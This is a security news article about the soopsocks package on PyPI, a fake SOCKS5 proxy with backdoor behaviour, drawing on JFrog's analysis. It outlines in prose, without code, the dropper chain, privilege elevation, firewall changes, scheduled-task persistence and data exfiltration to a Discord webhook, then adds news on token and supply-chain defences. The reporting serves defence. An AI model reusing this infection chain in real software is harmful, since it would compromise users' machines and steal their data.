Cybersecurity researchers flagged a malicious package on the Python Package Index (PyPI) that presented itself as a SOCKS5 proxy but also contained backdoor-like functionality. The package, named soopsocks, attracted 2,653 downloads before it was removed; it was first uploaded on September 26, 2025, the same date the publisher account was created, by a user who registered as soodalpie.
In published analysis, JFrog said said the package behaved as a backdoor proxy server targeting Windows platforms and used automated installation processes delivered via a VBScript or a compiled executable. The executable, “_AUTORUN.EXE”, is a compiled Go binary that implements SOCKS5 functionality while also running PowerShell scripts, setting firewall rules and attempting to relaunch itself with elevated privileges, the report said.
JFrog’s analysis said the malware performs basic system and network reconnaissance – including checking Internet Explorer security settings and the Windows installation date – and exfiltrates collected information to a hard-coded Discord webhook. The package versions 0.2.5 and 0.2.6 drop a Visual Basic script, “_AUTORUN.VBS”, which launches a PowerShell script that downloads a ZIP containing a legitimate Python binary from an external host and builds a batch script to install and run the package via pip.
The PowerShell and batch steps, the analysis said, cause the Python component to execute, attempt privilege elevation, configure firewall rules to allow UDP and TCP traffic on port 1080, register the software as a service and establish persistence using a scheduled task so the code restarts after reboots. JFrog noted the transition from simple Python scripts to a Go executable with hard-coded parameters as an indicator of malicious intent.
The disclosure comes amid broader concerns about software supply chain security. Package maintainers have raised issues about CI/CD 2FA workflows and token management after recent changes, Socket said said. GitHub has said said it will revoke legacy tokens and shorten default expiration windows for npm tokens, and Socket has released a free tool, Socket Firewall, to block known malicious packages at install time across ecosystems, the company added.